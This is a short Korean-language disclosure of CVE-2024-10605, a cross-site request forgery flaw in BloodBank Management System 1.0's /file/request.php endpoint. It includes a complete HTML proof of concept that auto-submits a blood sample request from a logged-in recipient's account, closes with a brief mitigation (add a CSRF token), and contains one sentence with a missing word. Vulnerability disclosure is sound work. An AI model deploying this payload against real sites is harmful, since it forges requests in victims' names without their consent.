
BloodBank Management System 1.0의 CSRF 취약점인 CVE-2024-10605에 대한 개념 증명으로, 승인되지 않은 혈액 샘플 요청을 가능하게 합니다.
file/request.php이 엔드포인트 /file/request.php에는 사이트 간 요청 위조(CSRF)가 존재하며, 이를 통해 원격 사용자가 로그인한 수신자 계정에서 선택한 병원의 사용 가능한 혈액 샘플에 대해 혈액 샘플 요청을 시작할 수 있습니다.
성공적인 악용은 피해자를 대신한 으로 이어질 수 있습니다. 또한, 이는 페이로드가 포함된 악성 웹사이트를 방문함으로써 악용될 수 있습니다.
다음은 로그인한 수신자 계정에서 혈액 샘플 요청을 시작하는 CSRF POC 공격의 예입니다:
<html>
<head>
<title>CSRF PoC</title>
</head>
<body>
<form action="http://localhost.local/bloodbank/file/request.php" method="POST" enctype="application/x-www-form-urlencoded">
<input name="bid" value="16">
<input name="hid" value="3">
<input name="bg" value="B-">
<input name="request" value="Request+Sample">
</form>
<script>
document.querySelector("form").submit();
</script>
</body>
</html>
csrf 토큰을 포함하세요.